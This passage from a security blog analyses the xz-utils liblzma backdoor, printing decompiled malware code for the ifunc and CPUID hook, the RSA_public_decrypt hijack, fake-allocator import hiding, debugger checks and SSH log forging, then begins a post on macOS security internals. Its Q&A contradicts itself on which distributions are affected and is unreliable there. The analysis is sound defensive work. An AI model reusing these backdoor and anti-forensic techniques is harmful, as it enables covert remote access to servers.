<pre><code class="lang-bash"><span class="hljs-variable">$AM_V_CCLD</span><span class="hljs-variable">$liblzma_la_LINK</span> -rpath <span class="hljs-variable">$libdir</span> <span class="hljs-variable">$liblzma_la_OBJECTS</span> <span class="hljs-variable">$liblzma_la_LIBADD</span>
</code></pre>
<h3 id="heading-the-payload">The Payload</h3>
<p>The malicious code they contain gets incorporated into the final shared library <code>liblzma</code>. While SSH itself doesn't use <code>liblzma</code>, many linux distributions bundle SSH's systemd component, which depends on <code>liblzma</code>.</p>
<p>As explained earlier, during the rebuilding of <code>liblzma</code>, the added bits in the <code>crc64_fast.c</code> source file that compiled to <code>liblzma_la-crc64-fast.o</code>, specifically the modified <code>_is_arch_extension_supported()</code> function which calls the external <code>_get_cpuid()</code> function. This function is not part of the xz-utils codebase; instead, it is provided by a malicious object file that the script injects into the build process.</p>
<p>Below the original <code>is_arch_extension_supported()</code> function from the <code>crc_x86_clmul.h</code> header file.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">bool</span>
<span class="hljs-title">is_arch_extension_supported</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span>
</span>{
    <span class="hljs-keyword">uint32_t</span> eax, ebx, ecx, edx;

    <span class="hljs-comment">/* Check if CPU supports CLMUL instruction set */</span>
    __get_cpuid(<span class="hljs-number">1</span>, &amp;eax, &amp;ebx, &amp;ecx, &amp;edx);
    <span class="hljs-keyword">return</span> (ecx &amp; (<span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">1</span>)) &amp;&amp; (ecx &amp; (<span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">9</span>));
}
</code></pre>
<p>The malicious script replaces this function with a custom <code>_is_arch_extension_supported()</code> function that calls the injected <code>_get_cpuid()</code> function instead:</p>
<pre><code class="lang-c"><span class="hljs-keyword">extern</span> <span class="hljs-keyword">int</span> _get_cpuid(<span class="hljs-keyword">int</span>, <span class="hljs-keyword">void</span>*, <span class="hljs-keyword">void</span>*, <span class="hljs-keyword">void</span>*, <span class="hljs-keyword">void</span>*, <span class="hljs-keyword">void</span>*);

<span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">bool</span> _is_arch_extension_supported(<span class="hljs-keyword">void</span>) {
    <span class="hljs-keyword">int</span> success = <span class="hljs-number">1</span>; 
    <span class="hljs-keyword">uint32_t</span> r[<span class="hljs-number">4</span>];
    success = _get_cpuid(<span class="hljs-number">1</span>, &amp;r[<span class="hljs-number">0</span>], &amp;r[<span class="hljs-number">1</span>], &amp;r[<span class="hljs-number">2</span>], &amp;r[<span class="hljs-number">3</span>], ((<span class="hljs-keyword">char</span>*) __builtin_frame_address(<span class="hljs-number">0</span>))<span class="hljs-number">-16</span>);
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">uint32_t</span> ecx_mask = (<span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">1</span>) | (<span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">9</span>) | (<span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">19</span>);
    <span class="hljs-keyword">return</span> success &amp;&amp; (r[<span class="hljs-number">2</span>] &amp; ecx_mask) == ecx_mask;
}
</code></pre>
<p>Compared to the original function, it calls the malicious <code>_get_cpuid()</code> function instead of using the built-in <code>__get_cpuid()</code> instruction. It checks for an additional CPU feature flag (bit 19 of the <code>ecx</code> register) along with the <code>CLMUL</code> flags, but as the <code>_get_cpuid()</code> is provided by the malicious binary, it acts as the hook into backdooring <code>sshd</code>.</p>
<p><code>is_arch_extension_supported</code> calls <code>__get_cpuid</code> (provided by GCC), but the backdoored build script modifies <code>crc64_fast.c</code> so it calls <code>_get_cpuid</code> instead, which is responsible for carrying out the primary malicious actions of the backdoor. One of the key malicious actions performed by <code>_get_cpuid()</code> is the modification of the Global Offset Table (GOT) and Procedure Linkage Table (PLT) for the executable being built.</p>
<p>The <code>_get_cpuid()</code> function is executed during the build process, allowing it to perform modify the GOT and PLT to hijack the <code>RSA_public_decrypt()</code> function. This is achieved by exploiting the GNU indirect function (ifunc) mechanism, which allows for dynamic resolution of function implementations at runtime based on certain conditions, such as CPU capabilities.</p>
<p>The reason the backdoor hijacks the ifunc resolver is because ifunc resolvers are executed very early during program startup, before the GOT and PLT are marked read-only for security reasons. By intercepting the ifunc resolver and injecting the malicious <code>_get_cpuid()</code> function, the backdoor can modify the GOT and PLT while they are still writable, allowing the hijacking of <code>RSA_public_decrypt()</code>.</p>
<pre><code class="lang-cpp"><span class="hljs-function">__int64 __fastcall <span class="hljs-title">sub_A710</span><span class="hljs-params">(<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> a1, __int64 a2
{
    __int64 v4; <span class="hljs-comment">// r9</span>
    <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> v6; <span class="hljs-comment">// [rsp+14h] [rbp-4Ch] BYREF</span>
    <span class="hljs-keyword">char</span> v7[<span class="hljs-number">4</span>]; <span class="hljs-comment">// [rsp+18h] [rbp-48h] BYREF</span>
    <span class="hljs-keyword">char</span> v8[<span class="hljs-number">4</span>]; <span class="hljs-comment">// [rsp+1Ch] [rbp-44h] BYREF</span>
    __int64 v9[<span class="hljs-number">8</span>]; <span class="hljs-comment">// [rsp+20h] [rbp-40h] BYREF</span>

    v4 = <span class="hljs-number">0L</span>L;
    <span class="hljs-keyword">if</span> ( dword_CF48 == <span class="hljs-number">1</span> )
    {
        v9[<span class="hljs-number">0</span>] = <span class="hljs-number">1L</span>L;
        <span class="hljs-built_in">memset</span>(&amp;v9[<span class="hljs-number">1</span>], <span class="hljs-number">0</span>, <span class="hljs-number">32</span>);
        v9[<span class="hljs-number">5</span>] = a2;
        Llzma_block_param_encoder_0(v9, a2, a3, a4, v9, <span class="hljs-number">0L</span>L);
        v4 = a2;
    }
    ++dword_CF48;
    cpuid(a1, &amp;v6, v7, v8, v9, v4);
    <span class="hljs-keyword">return</span> v6;
}</span></span>
</code></pre>
<p>The <code>Llzma_index_prealloc_0()</code> function is where the hijacking of the <code>RSA_public_decrypt()</code> function's GOT (Global Offset Table) entry takes place. The code first checks if the <code>Llzma12_coder_1</code> variable is not null, and then proceeds to retrieve the address of the original <code>RSA_public_decrypt()</code> function.</p>
<pre><code class="lang-c"><span class="hljs-function">__int64 __fastcall <span class="hljs-title">Llzma_index_prealloc_0</span><span class="hljs-params">(<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> a1, __int64 a2, __int64 a3,  __int64 a4, __int32 a5)</span>
</span>{
    __int64 (__fastcall **v4)(_QWORD, __int64, __int64, __int64); <span class="hljs-comment">// rax</span>
    __int64 (__fastcall *v5)(_QWORD, __int64, __int64, __int64); <span class="hljs-comment">// r14</span>
    __int64 result; <span class="hljs-comment">// rax</span>
    _int64 v8; <span class="hljs-comment">// [rsp+Oh] [rbp-48h]</span>
    <span class="hljs-keyword">int</span> v9[<span class="hljs-number">11</span>]; <span class="hljs-comment">// [rsp+1Ch] [rbp-2Ch] BYREF</span>

    <span class="hljs-keyword">if</span> ( !Llzma12_coder_1 )
        <span class="hljs-keyword">return</span> <span class="hljs-number">0L</span>L;
    v4 = *(__int64 (__fastcall ***)(_QWORD, __int64, __int64, __int64))(Llzma12_coder_1 + <span class="hljs-number">8</span>);
    <span class="hljs-keyword">if</span> ( !v4 )
        <span class="hljs-keyword">return</span> <span class="hljs-number">0L</span>L;
    v5 = *v4;
    <span class="hljs-keyword">if</span> ( !*v4 )
        <span class="hljs-keyword">return</span> <span class="hljs-number">0L</span>L;
    <span class="hljs-keyword">if</span> ( !a4 )
        <span class="hljs-keyword">return</span> v5(a1, a2, a3, a4);
    v8 = a4;
    v9[<span class="hljs-number">0</span>] = <span class="hljs-number">1</span>;
    result = Llzma_index_stream_size_1(a4, Llzma12_coder_1, v9);
    a4 = v8;
    <span class="hljs-keyword">if</span> ( v9[<span class="hljs-number">0</span>] )
        <span class="hljs-keyword">return</span> v5(a1, a2, a3, a4);
    <span class="hljs-keyword">return</span> result;
    }
</code></pre>
<p>The code will verify the remote server's host key with a specific <a target="_blank" href="https://eprint.iacr.org/2015/625">Ed448</a> key, when this authentication is successful it executes its code through the <code>system()</code> function. Otherwise, it will just continue on to the original version. As the hook is to the <code>RSA_public_decrypt</code> function, a function originally used for <a target="_blank" href="https://www.openssl.org/docs/manmaster/man3/RSA_public_decrypt.html">validating RSA signatures</a>, the code can tamper with SSH's authentication mechanism. The hook code examines the <code>RSA</code> public modulus, and this modulus is completely controlled by the attackers who are connecting to the SSH client.</p>
<p>When logging into the impacted machine using the attacker's SSH certificate, the attack payload is extracted from the public key, then further verified, and finally decrypted using the <a target="_blank" href="https://cr.yp.to/chacha.html">ChaCha20</a> symmetric stream cipher, and the decrypted data is executed as a command.</p>
<pre><code class="lang-plaintext">0a 31 fd 3b 2f 1f c6 92 92 68 32 52 c8 c1 ac 28
34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48
</code></pre>
<p>The decrypted data contains 114 bytes of signature which is matched with the following Ed448 public key :</p>
<pre><code class="lang-plaintext">0a 31 fd 3b 2f 1f c6 92 92 68 32 52 c8 c1 ac 28
34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48
10 0c b0 6c 3a be 14 ee 89 55 d2 45 00 c7 7f 6e
20 d3 2c 60 2b 2c 6d 31 00
</code></pre>
<p>The decrypted payload string is then executed as a shell command by passing it directly to <code>system()</code> (through a fake allocator mechanism that will be discussed on the next section) only if the signatures are confirmed as valid, otherwise the code passes execution back to to the original function.</p>
<pre><code class="lang-c"><span class="hljs-function">__int64 __fastcall <span class="hljs-title">Llzma_delta_decoder_init_part_0</span><span class="hljs-params">(_QWORD *a1)</span>
</span>{
    __int64 result; <span class="hljs-comment">// rax</span>
    result = <span class="hljs-number">5L</span>L;
    <span class="hljs-keyword">if</span> ( a1 )
    {
        a1[<span class="hljs-number">7</span>] = &amp;Lfilter_options_0;
        result = <span class="hljs-number">0L</span>L;
        <span class="hljs-keyword">if</span> ( !a1[<span class="hljs-number">6</span>] )
        {
            a1[<span class="hljs-number">13</span>] = <span class="hljs-number">4L</span>L;
            a1[<span class="hljs-number">8</span>] = sub_28C0;
            a1[<span class="hljs-number">9</span>] = Llzma_index_prealloc_0;
            a1[<span class="hljs-number">10</span>] = Llzma12_mode_map_part_1;
            a1[<span class="hljs-number">11</span>] = Lfile_info_decode_0;
            a1[<span class="hljs-number">14</span>] = Lbt_skip_func_part_0;
            a1[<span class="hljs-number">15</span>] = <span class="hljs-number">101L</span>L;
        }
    }
    <span class="hljs-keyword">return</span> result;
}
</code></pre>
<p>The public key is known, but only the attackers have the corresponding Ed448 private signing key, which means the backdoor can only be used by the attackers and the signature is bound to the host’s public key, meaning that a valid signatures can't be reused on different hosts.</p>
<hr />
<h3 id="heading-stealthy-anti-forensic-tricks">Stealthy Anti-Forensic Tricks</h3>
<p>The code tries very hard (harder than most malware) to remain hidden. If the level of the sophistication in the obufuscating and the backdoor delivery section of the malware haven't convinced you that this isn't a state-backed actor, than the lengths it goes to hide its activities might.</p>
<p>The liblzma library provides a memory allocation layer that forwards allocation and deallocation requests to dedicated allocator objects. When calling <code>lzma_alloc</code> or <code>lzma_free</code>, the library essentially invokes the corresponding function pointers within the provided allocator object.</p>
<p>The malware implements a fake allocator by abusing the <code>lzma_alloc</code> function from the liblzma library. Instead of performing memory allocation, this fake allocator is designed to look up symbol addresses based on string IDs. When <code>lzma_alloc</code> is called with a string ID as the size argument, the fake allocator interprets it as a request to resolve the corresponding symbol. The string IDs used by the malware are divisible by 8 and fall within the range of 10 to 0xd10, making them appear like plausible size values at first glance.</p>
<p>The fake allocator object is returned by a function named <code>.Lstream_decoder_memconfig.part.1</code>. This allocator structure contains a context pointer, which is passed to the allocation and deallocation functions. In the case of the fake allocator, the <code>opaque</code> member of the allocator structure is used to store a pointer to internal ELF module descriptor records, providing additional context for symbol resolution.</p>
<p>The usage pattern of the fake allocator can be summarized as follows: First, the <code>GetFakeAllocator</code> function is called to obtain a pointer to the fake allocator object. Next, the <code>opaque</code> member of the allocator is set to point to the ELF module descriptor for the desired library (e.g., libc). Then, <code>lzma_alloc</code> is called with a string ID representing the symbol to be resolved (e.g., <code>0xAB8</code> for <code>setresuid</code>). The returned pointer represents the resolved symbol address, which can be used or stored by the malware as needed.</p>
<p>This allocator is used to resolve and call <code>system()</code>, effectively hiding these calls from static analysis. The <code>lzma_alloc</code> function is typically used for memory allocation purposes within the liblzma library. However, the malware hijacks this function and repurposes it as an import resolution mechanism. The malware achieves this by implementing a custom <code>lzma_allocator</code> structure and providing it to the <code>lzma_alloc</code> function.</p>
<p>The <code>lzma_allocator</code> structure has three fields: <code>alloc</code>, <code>free</code>, and <code>opaque</code>. The malware sets the <code>alloc</code> field to point to the <code>Linit_pric_table_part_1</code> function, and the <code>free</code> field to <code>Lstream_decode_1</code>. However, the true purpose of these functions is not memory allocation/deallocation; instead, they serve as wrappers for resolving and calling imported functions.</p>
<pre><code class="lang-c">system_func = lzma_alloc(STR_system_, lzma_allocator);
ctx-&gt;system = system_func;
<span class="hljs-keyword">if</span> (system_func)
    ++ctx-&gt;num_imports;
</code></pre>
<p>In this code snippet, <code>STR_system_</code> is likely a string representation of the "system" function name. The <code>lzma_alloc</code> function treats this as a request to resolve the <code>system()</code> import and returns the corresponding function address, which is then stored in <code>system_func</code>.</p>
<pre><code class="lang-c">ulong _Llzma_index_buffer_encode_0(Elf64_Ehdr **p_elf, undefined *elf_info, ctx *ctx)
{
    <span class="hljs-keyword">long</span> lzma_allocator;
    ulong uVar1;
    <span class="hljs-keyword">void</span> *fn_read;
    <span class="hljs-keyword">void</span> *fn___errno_location;

    <span class="hljs-comment">// Get the address of the custom lzma_allocator</span>
    lzma_allocator = get_lzma_allocator(<span class="hljs-number">1</span>);

    <span class="hljs-comment">// Parse the ELF file and store information in elf_info</span>
    uVar1 = parse_elf(*p_elf, elf_info);

    <span class="hljs-comment">// If the ELF parsing was successful</span>
    <span class="hljs-keyword">if</span> ((<span class="hljs-keyword">int</span>)uVar1 != <span class="hljs-number">0</span>) {
        <span class="hljs-comment">// Store the parsed elf_info in the opaque field of lzma_allocator</span>
        *(undefined **)(lzma_allocator + <span class="hljs-number">0x10</span>) = elf_info;

        <span class="hljs-comment">// Resolve the "read" import using lzma_alloc</span>
        fn_read = (<span class="hljs-keyword">void</span> *)lzma_alloc(<span class="hljs-number">0x308</span>, lzma_allocator);
        ctx-&gt;fn_read = fn_read;
        <span class="hljs-keyword">if</span> (fn_read != (<span class="hljs-keyword">void</span> *)<span class="hljs-number">0x0</span>) {
            ctx-&gt;num_imports++;
        }

        <span class="hljs-comment">// Resolve the "__errno_location" import using lzma_alloc</span>
        fn___errno_location = (<span class="hljs-keyword">void</span> *)lzma_alloc(<span class="hljs-number">0x878</span>, lzma_allocator);
        ctx-&gt;__errno_location = fn___errno_location;
        <span class="hljs-keyword">if</span> (fn___errno_location != (<span class="hljs-keyword">void</span> *)<span class="hljs-number">0x0</span>) {
            ctx-&gt;num_imports++;
        }

        <span class="hljs-comment">// Set uVar1 to 1 if both imports were resolved successfully</span>
        uVar1 = (ulong)(ctx-&gt;num_imports == <span class="hljs-number">2</span>);
    }

    <span class="hljs-keyword">return</span> uVar1;
}
</code></pre>
<p>The third field of the <code>lzma_allocator</code> structure, accessed via the offset <code>0x10</code> (<code>lzma_allocator + 0x10</code>), is abused to pass information about the loaded ELF file to the "fake allocator" function. This field, which can be considered as the <code>opaque</code> field, is set to the <code>elf_info</code> pointer (<code>*(undefined **)(lzma_allocator + 0x10) = elf_info;</code>), which contains information about the parsed ELF file. This information can then be used by the "fake allocator" functions, such as <code>Linit_pric_table_part_1</code> (acting as the <code>alloc</code> function) and <code>Lstream_decode_1</code> (acting as the <code>free</code> function), to perform additional operations based on the loaded ELF file.</p>
<p>This allows the malware to hide critical function calls from static analysis tools, as these calls are not directly visible in the binary's code. Additionally, by abusing the <code>lzma_alloc</code> function, the malware can dynamically resolve and call imported functions without relying on traditional import resolution mechanisms, making it harder to detect and analyze the malware's behavior.</p>
<p>The binary also checks if a software breakpoint has been inserted by a debugger. It checks if the instruction at the given <code>code_addr</code> is the <code>endbr64</code> instruction (<code>0xfa1e0ff3</code>) , which is typically present when a debugger inserts a software breakpoint.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Check if the instruction endbr64 is overwritten (software breakpoint detection)</span>
<span class="hljs-function"><span class="hljs-keyword">bool</span> <span class="hljs-title">breakpointcheck</span><span class="hljs-params">(<span class="hljs-keyword">int</span> *param_1,<span class="hljs-keyword">long</span> param_2,uint param_3)</span>
</span>{
  <span class="hljs-keyword">bool</span> bVar1;
  bVar1 = <span class="hljs-literal">false</span>;
  <span class="hljs-keyword">if</span> (<span class="hljs-number">3</span> &lt; param_2 - (<span class="hljs-keyword">long</span>)param_1) {
    bVar1 = (param_3 | <span class="hljs-number">0x5e20000</span>) + *param_1 == <span class="hljs-number">0xf223</span>;<span class="hljs-comment">// 5E2E230</span>
  }
  <span class="hljs-keyword">return</span> bVar1;
}
</code></pre>
<p>The condition checks if the difference between <code>param_2</code> and <code>(long)param_1</code> is greater than 3, which ensures that there is enough space to read the <code>endbr64</code> instruction which is 4 bytes. If the condition is true, the function returns the result of the expression <code>(param_3 | 0x5e20000) + *param_1 == 0xf223</code>. This expression checks if the value at <code>(long)param_1</code> (dereferenced) is equal to <code>0xfa1e0ff3</code> (the <code>endbr64</code> instruction) by performing bitwise operations on <code>a3</code> and comparing the result with <code>0xF223</code>.</p>
<p>As the attacker uses this remote code execution exploit to bypass SSH's regular authentication methods, one might assume that this activity is easily fingerprinted in the SSH connection logs. But the code appears to have7 a mechanism to construct fake log entries to replace a successful connection message in an SSH server's log.</p>
<pre><code class="lang-c">ConnectionClosedBy = ssh_consts-&gt;ConnectionClosedBy;
<span class="hljs-keyword">for</span> (i = <span class="hljs-number">0L</span>L; i != <span class="hljs-number">21</span>; log_line[i - <span class="hljs-number">1</span>] = v26) <span class="hljs-comment">// "Connection closed by "</span>
   v26 = *(ConnectionClosedBy + i++);
authenticating = ssh_consts-&gt;authenticating; <span class="hljs-comment">// "authenticating"</span>
<span class="hljs-keyword">for</span> (j = <span class="hljs-number">0L</span>L; j != <span class="hljs-number">14</span>; ++j)
   log_line[j + <span class="hljs-number">21</span>] = *(authenticating + j);
log_line[<span class="hljs-number">35</span>] = <span class="hljs-string">' '</span>;
user_string = ssh_consts-&gt;user_string; <span class="hljs-comment">// "user"</span>
<span class="hljs-keyword">for</span> (k = <span class="hljs-number">0L</span>L; k != <span class="hljs-number">4</span>; ++k)
   log_line[k + <span class="hljs-number">36</span>] = *(user_string + k);
log_line[<span class="hljs-number">40</span>] = <span class="hljs-string">' '</span>;
v31 = ssh_consts-&gt;string_percent_s_key; <span class="hljs-comment">// "%s"</span>
log_line[<span class="hljs-number">41</span>] = *v31;
LOBYTE(v31) = v31[<span class="hljs-number">1</span>];
log_line[<span class="hljs-number">43</span>] = <span class="hljs-string">' '</span>;
log_line[<span class="hljs-number">42</span>] = v31;
v32 = ssh_consts-&gt;string_percent_s_key; <span class="hljs-comment">// %s</span>
log_line[<span class="hljs-number">44</span>] = *v32;
LOBYTE(v32) = v32[<span class="hljs-number">1</span>];
*&amp;log_line[<span class="hljs-number">46</span>] = <span class="hljs-string">'['</span>; <span class="hljs-comment">// "["</span>
log_line[<span class="hljs-number">45</span>] = v32;
string_preauth = ssh_consts-&gt;string_preauth; <span class="hljs-comment">// "preauth"</span>
<span class="hljs-keyword">for</span> (m = <span class="hljs-number">0L</span>L; m != <span class="hljs-number">7</span>; ++m)
{
   LOBYTE(ConnectionClosedBy) = *(string_preauth + m);
   log_line[m + <span class="hljs-number">48</span>] = ConnectionClosedBy;
}
log_line[<span class="hljs-number">55</span>] = <span class="hljs-string">']'</span>; <span class="hljs-comment">// "]"</span>
v19 = LODWORD(ssh_consts-&gt;field_8) == <span class="hljs-number">0</span>;
ssh_consts-&gt;started_ssh_log_hiding = <span class="hljs-number">1</span>;
<span class="hljs-keyword">if</span> (!v19)
{
   <span class="hljs-keyword">if</span> (runtime_functions)
   {
       v35 = runtime_functions-&gt;setlogmask;
       <span class="hljs-keyword">if</span> (v35)
           v35(<span class="hljs-number">0xFF</span>LL, string_preauth, &amp;log_line[<span class="hljs-number">48</span>], ConnectionClosedBy, v22, right_after_accept_string_1);
   }
}
result = MEMORY[<span class="hljs-number">0x7FEAAF6399B15</span>]( <span class="hljs-comment">// calls sshlogv</span>
   ssh_consts,
   <span class="hljs-number">3L</span>L,
   log_line,
   &amp;username,
   &amp;ip_address,
   right_after_accept_string);
</code></pre>
<p>The function starts by initializing several variables with values from the <code>ssh_consts</code> structure, which contains constants and strings used in the SSH server's logging mechanism. It then constructs a log entry string in the <code>log_line</code> buffer. The string starts with the text "Connection closed by" followed by the "authenticating" and "user" strings.</p>
<p>It adds placeholders for variables ("%s") and encloses the "preauth" string in square brackets. It sets a flag <code>started_ssh_log_hiding</code> to 1, indicating that the log hiding functionality is being used and if a <code>runtime_functions</code> structure is available, it calls the <code>setlogmask</code> function with the "preauth" string and parts of the constructed log entry as arguments.</p>
<pre><code class="lang-c">Connection from <span class="hljs-number">172.17</span><span class="hljs-number">.0</span><span class="hljs-number">.1</span> port <span class="hljs-number">46722</span> on <span class="hljs-number">172.17</span><span class="hljs-number">.0</span><span class="hljs-number">.2</span> port <span class="hljs-number">22</span> rdomain <span class="hljs-string">""</span>
Connection closed by authenticating user root <span class="hljs-number">172.17</span><span class="hljs-number">.0</span><span class="hljs-number">.1</span> port <span class="hljs-number">46722</span> [preauth]
</code></pre>
<p>The backdoor effectively replaces log entries describing successful connections with the backdoor with entries describing failed connection attempts. So while you might see a spike in failed SSH connections in your logs, you might not be able to determine effectively if you're impacted by this backdoor or not.</p>
<hr />
<h2 id="heading-qampa-and-conclusions">Q&amp;A and Conclusions</h2>
<p><strong>Q :</strong> Is this a major problem? Should i burn every piece of linux-based technology i have? Should i wake up my sysadmins at 12 am to fix this?</p>
<p><strong>A :</strong> As mentioned previously, the backdoor only compiles under x86-based systems running Debian, and a bleeding edge or unstable version of Debian at that which you SHOULD NEVER RUN IN A PRODUCTION ENVIRONMENT EVER.</p>
<p><strong>Q :</strong> But can an attacker repurpose this attack? Maybe by patching the authentication mechanism?</p>
<p><strong>A :</strong> This still means that they need to attack an x86 machine running a Debian distribution. The RCE does not compile in non-x86 machines (so M-series Macs are excluded) and it will also not compile if its not part of an RPM package build. Even if someone was able to <a target="_blank" href="https://github.com/amlweems/xzbot?tab=readme-ov-file#ed448-patch">modify the compiled</a> exploit, this will still be too impractical to repurpose and exploit.</p>
<hr />
<p><strong>Q :</strong> Isn't the open source development supposed to stop this type of attack? Why didn't it get caught sooner?</p>
<p><strong>A :</strong> It's clear from the communications between the owner of xz-utils Lasse Collin and a couple other suspicious Github accounts, that he was pressured to make changes and cede control to Jia Tan, plus he was <a target="_blank" href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00568.html">gaslit</a> and <a target="_blank" href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00567.html">bullied</a> repeatedly. Add to the fact that working in an open source package decompresser utility isn't as sexy as pushing PRs to frida or the linux kernel, it made sense why this happened.</p>
<p>The attack was caught because someone was able to audit the code independently, without having to manually reverse engineer the full source code or anything. Something you can't do as easily in a proprietary piece of software.</p>
<hr />
<p><strong>Q :</strong> Why wasn't this caught by systems like EDRs, AVs, or Runtime Dependency Monitoring tools like Amazon Inspector?</p>
<p><strong>A :</strong> Coverage of EDRs in Linux environments are not that good, so its not entirely stupid to suggest that no amount of security mumbo-jumbo was able to catch this through heuristics. But many are forgetting the fact that this is deployed in unstable branches of many distros, which are not for production workloads and thus would probably not have security tools in place. It would be a different story if they got this into Ubuntu Server or RHEL.</p>
<p>For what its worth, <a target="_blank" href="https://www.crowdstrike.com/blog/cve-2024-3094-xz-upstream-supply-chain-attack/">Crowdstrike did say</a> that they were able to detect the initial compilation of the binary through the usage of the <code>tr</code> command.</p>
<hr />
<p>Are there probably more sleeper RCEs in popular linux dependencies? I dont know. I do hope that this incident will inspire alot of us to take a deeper look at many of the dependencies we blindly trust today.</p>
<p>Who did it? Nobody knows exactly, but some fingers are already being pointed at several <a target="_blank" href="https://www.wired.com/story/jia-tan-xz-backdoor/">old players</a>. The actor has gone to great lenghts in making it seem like he works in China, from the UTC +8 commit times correlating to office hours in the Mainland and using a Singaporean VPN node. But this seems abit too easy to spot and is likely a misdirection strategy. For what its worth, i do believe its a state-sponsored attack and not some single-guy basement dweller, i just don't have the confidence (or experience) to say who exactly.</p>
<p>Did this take a lot more time than i had expected? Yes.</p>
]]></content:encoded></item><item><title><![CDATA[Internals of macOS Endpoint Security Products]]></title><description><![CDATA[Cover Illustration by cloudnienty

This research was done using software obtained by myself individually, analyzed using hardware owned by myself individually. Some code is simplified and edited to provide clarity.
The article is not intended to harm...]]></description><link>https://research.meekolab.com/internals-of-macos-endpoint-security-products</link><guid isPermaLink="true">https://research.meekolab.com/internals-of-macos-endpoint-security-products</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Sat, 17 Feb 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1711394846463/759c8160-c7cd-4bcd-993f-2d081a6b1590.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by cloudnienty</em></strong></p>
<hr />
<p><strong><em>This research was done using software obtained by myself individually, analyzed using hardware owned by myself individually. Some code is simplified and edited to provide clarity.</em></strong></p>
<p><strong>The article is not intended to harm any company’s product and is constructed for educational purposes only.</strong></p>
<hr />
</blockquote>
<p>The stealing of Google's Proprietary TPU architecture by a Chinese-national has underscored the risk of insider threats and the importance of endpoint security systems like EDRs and DLPs in the prevention of cloud-based exfiltration methods.</p>
<p>According to the indictment by the DOJ, he exfiltrated the data by copying the contents of the document from the Google source files into the Apple Notes application on his Google work laptop, and then converting them from Apple Notes to PDFs to avoid detection by Google’s DLP systems. This is admittedly a clever, albeit stupid way, on circumventing endpoint security systems. So if Google, which probably spends <a target="_blank" href="https://www.reddit.com/r/sysadmin/comments/6k85q1/which_dlp_do_you_use_in_your_environments/">millions a year</a> on security software, can still get their proprietary information stolen using the Apple Notes app, how does your implementation fares?</p>
<p>While the process of dissecting endpoint security agents and drivers in Windows are well documented, the same can't be said for macOS-based security solutions. While the implementation of DLP/EDR systems will become easier with the advent of <a target="_blank" href="https://developer.apple.com/support/kernel-extensions/">System Extensions</a> and the <a target="_blank" href="https://blog.maikxchd.com/introduction-to-the-apple-endpoint-security-framework">Endpoint Security API</a>, older implementations might look like a black box in comparison. So as a goodbye to kernel extensions, we're gonna take a quick dive into how security products use kernel extensions.</p>
<h3 id="heading-the-funny-world-of-macos-internals">The Funny World of macOS Internals</h3>
<p>macOS is based on the <a target="_blank" href="https://github.com/apple-oss-distributions/xnu">XNU</a> kernel ("X is Not Unix"), which is a hybrid kernel that combines elements from both the Mach and BSD.</p>
<p>Mach is a UNIX-compatible microkernel which is designed to minimize the amount of code running in the <strong>kernel</strong> space and instead allow many typical kernel functions, such as file system, networking, and I/O, to <strong>run as</strong> user-level tasks. Mach is responsible for many low-level operations a kernel typically handles, such as processor scheduling, multitasking, and virtual memory management.</p>
<p>On the other hand, BSD contributes higher-level features, such as the POSIX API, file system management (through APFS), networking, and what will be the main focus of the article, the <a target="_blank" href="https://developer.apple.com/library/archive/technotes/tn2127/_index.html">KAuth KPI</a>. KAuth is the kernel programming interface (KPI) thats responsible for mediating actions that affect the system's security posture, such as file access, network operations, and process management. It operates by registering listeners for various authorization scopes, which then respond to authorization requests by allowing, denying, or deferring decisions based on the policy implemented by the listener.</p>
<p>XNU (Darwin) is a descendent of Rhapsody (OPENSTEP/NeXTSTEP), which also a heavily customized mix of components such as OSFMK (Mach), 4.4BSD and Yellow Box (which would eventually become Cocoa). The Mach microkernel at the time had better symmetric multiprocessing and memory protection capabilities, and by combining it with FreeBSD (which was derived from the Unix codebase) XNU could maintain compatibility with existing Unix programs and APIs used in many academic and professional settings at the time.</p>
<p>As BSD and Mach are built upon different conceptual frameworks which leads to some funny interactions between the two, such as :</p>
<ul>
<li><p>In BSD, signals are delivered to processes. However, in Mach, signals are delivered to individual threads. XNU bridges this gap by delivering signals to the Mach thread that is associated with the BSD process that is intended to receive the signal.</p>
</li>
<li><p>When a new process is created via <code>fork()</code> in BSD, the child process inherits a copy of the parent's file descriptors. In Mach, tasks do not have a notion of file descriptors. XNU handles this by creating a new task for the child process and sharing the parent's file descriptor rights with the child task.</p>
</li>
<li><p>BSD manages memory at the process level, while Mach manages memory at the task level. XNU maps the BSD process memory model to Mach's task-based memory management by creating a Mach virtual memory object for each BSD process.</p>
</li>
<li><p>BSD schedules processes, while Mach schedules threads. XNU's scheduler is primarily based on Mach's thread scheduling mechanisms, but it also takes BSD's process priorities into account when determining which threads to schedule.</p>
</li>
<li><p>Mach's security model is based on port rights, whereas BSD's security model operates based on process ownership. Disparities between these two models have occasionally resulted in <a target="_blank" href="https://www.offsec.com/offsec/macos-preferences-priv-escalation/">local privilege-escalation</a> vulnerabilities.</p>
</li>
<li><p>While Mach provides a clean mechanism for kernel extensions through tasks, BSD lacks a similar mechanism. XNU allows for kernel extensions by leveraging Mach's task infrastructure, enabling third-party code to run in the kernel space as user-level tasks.</p>
</li>
</ul>
